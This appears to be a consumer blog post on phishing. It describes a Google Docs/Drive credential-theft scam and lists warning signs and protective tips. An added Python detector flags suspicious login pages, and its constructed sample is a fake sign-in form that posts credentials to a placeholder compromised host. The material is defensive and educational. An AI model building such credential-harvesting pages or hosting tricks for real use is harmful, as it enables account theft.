Phishing for Trouble

Thu 24 Apr 2014 15:30 ICT

What is phishing? No, it has nothing to do with jam bands. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. The first acts of phishing were recorded as early as 1995, when hackers tried to steal the passwords and credit card numbers of AOL (America Online) members. In the nearly 20 years since these first acts, hacking and phishing methods have become more sophisticated and, therefore, more dangerous. To avoid becoming a victim, check out the information and tips below.


How to avoid phishing scams

Even though various media sources (newspapers, television, even the internet) comment regularly on the dangers of online thievery and phishing, an alarming number of “normal” and “well-informed” people fall victim to cyber deceit every day. Then again, perhaps it’s not that surprising. Phishing scams are designed to convince you to share or give up personal information like credit card numbers, bank account information, social security numbers, and passwords. Sometimes the attackers use this information to steal money but, more often than not, they use it to steal identities. The easiest way to avoid phishing scams, then, is never, under any circumstances, to share personal information with unknown sources or online strangers.


How to protect yourself from becoming an (easy) target!

The best ways to protect yourself against phishing are education and extreme vigilance. Unfortunately, phishing is a part of modern-day life, but it is not something to which you need to succumb. An important thing to remember is that phishing scams usually arrive as e-mails or pop-up messages that claim to come from a legitimate organisation, often one you have a relationship with: your credit card company, bank, internet service provider or an online service such as PayPal. These messages ask you to update or validate your personal information in order to avoid serious consequences for your account. If you follow the instructions and click the designated button, you are taken to a website that looks identical to the legitimate one (but, as we know now, isn’t).

And then? Once on the website, you are asked to provide personal information. Don’t! Legitimate businesses will not approach you in this manner. We repeat: legitimate businesses will NOT approach you in this manner. If you have a question after receiving such an e-mail or pop-up message, call the organisation on the telephone and ask if the message was legitimate.

A new and tricky scam!

Researchers at Symantec (an anti-virus and security company) have recently discovered a new phishing scam that is tricking large numbers of users into handing their personal information to attackers, especially users of Google applications such as Google Drive and Google Docs.

The sophisticated scam targets Google Docs and Google Drive users. The scam sends a message with the simple subject “Documents” and urges the recipient to view an important document on Google Docs by clicking on the included link. The link doesn’t go to Google Docs, but it does go to Google, where a very convincing fake Google Docs login page is displayed.


The fake page is aesthetically convincing because it is hosted on a Google server. The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive’s preview feature to get a publicly-accessible URL to include in their messages.

This login page will look familiar to many Google users, as it’s used across Google’s services. (The text below, “One account. All of Google.” mentions what service is being accessed, but this is a subtlety that many will not notice.) It’s quite common to be prompted with a login page like this when accessing a Google Docs link, and many people may enter their credentials without a second thought.

After pressing “Sign in,” the user’s credentials are sent to a PHP script on a compromised web server. This page then redirects to a real Google Docs document, making the whole attack very convincing. Google accounts are a valuable target for phishers, as they can be used to access many services including Gmail and Google Play, which can be used to purchase Android applications and content.
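The two tell-tale signs in the scam just described are that the “sign-in” page lives on a file-hosting URL rather than Google’s real account domain, and that the credential form submits to a server other than the one that served the page. The script below is an added example (it is not part of the original post, nor Symantec’s or Google’s code) of how a defender or a browser extension could check a page for exactly those signs; the sample page, the Drive-style URL and the `.invalid` target host are constructed for illustration, and the list of file-hosting hosts is an assumption, not an authoritative list.

```python
"""Added example (not from the original post): warn when a page that asks for
a password is hosted on a file-sharing site, is served over plain http, or
would post the credentials to a different host than the one serving it."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hosts that serve user-uploaded files. A password prompt on one of them is
# suspicious because a real sign-in page lives on the provider's account domain.
# This set is an assumption made for the example, not an authoritative list.
FILE_HOSTING_HOSTS = {"drive.google.com", "docs.google.com"}


class _FormCollector(HTMLParser):
    """Record every <form>'s action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def assess_login_page(page_url, html):
    """Return a list of plain-language warnings for the page at page_url.

    An empty list means none of the three checks fired; it does not prove
    the page is genuine, only that it lacks these particular red flags.
    """
    page = urlsplit(page_url)
    collector = _FormCollector()
    collector.feed(html)
    password_forms = [f for f in collector.forms if f["has_password"]]
    if not password_forms:
        return []                      # nothing asks for a password; nothing to judge

    warnings = []
    if page.scheme != "https":
        warnings.append("page is not served over https")
    if page.hostname in FILE_HOSTING_HOSTS:
        warnings.append("password prompt hosted on a file-sharing host")
    for form in password_forms:
        # Resolve a relative action against the page URL before comparing hosts.
        target = urlsplit(urljoin(page_url, form["action"]))
        if target.scheme != "https":
            warnings.append("credentials would be sent over plain http")
        if target.hostname != page.hostname:
            warnings.append(
                f"credentials would be posted to {target.hostname}, not {page.hostname}"
            )
    return warnings


# Constructed sample resembling the scam described above: a page under a
# Drive preview-style URL whose sign-in form posts to a script elsewhere.
# Both the file id and the target host are placeholders, not real addresses.
SAMPLE_URL = "https://drive.google.com/file/d/EXAMPLE-FILE-ID/preview"
SAMPLE_HTML = """
<html><body>
<h1>Sign in</h1><p>One account. All of Google.</p>
<form method="post" action="http://compromised-host.invalid/gdocs/login.php">
  <input type="email" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed contrast case: a same-origin https sign-in form on an account domain.
LEGIT_URL = "https://accounts.google.com/ServiceLogin"
LEGIT_HTML = '<form method="post" action="/signin"><input type="password" name="Passwd"></form>'

if __name__ == "__main__":
    for label, url, html in (("scam sample", SAMPLE_URL, SAMPLE_HTML),
                             ("legit sample", LEGIT_URL, LEGIT_HTML)):
        print(label, "->", assess_login_page(url, html) or ["no warnings"])
```

The host comparison is the important one: the page says the stolen credentials go to a PHP script on a compromised web server, so the form’s action necessarily points away from the Google-hosted page, and that mismatch is visible in the HTML before anything is typed. The https check implements the padlock advice given later in the post, with the caveat that an encrypted connection says nothing about who is on the other end, which is why it is only one of the three signals.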

Common phishing come-ons include statements such as:

- Verify your account…
- Dear Valued Customer…
- If you don’t respond within 48 hours, your account will be closed…
- Click the link below to gain access to your account…

To protect yourself from phishing scams, many supervisory authorities offer the following advice:

- Never respond to the type of e-mail or pop-ups mentioned above.
- Keep your virus protection software up-to-date.
- Don’t send personal or financial information in e-mails. E-mail is insecure.
- When entering personal information on a website where you initiated the transaction, make sure the http in the address bar changes to https and the padlock icon appears in your browser window, indicating that the site is secure.
- Check your credit card statements carefully and report any charges that look suspicious.
- If you have broadband internet access, consider adding a firewall to protect your computer.
- Be very cautious when opening any e-mail attachments.
- Don’t download files you receive via e-mail unless you’re sure they’re coming from someone you trust.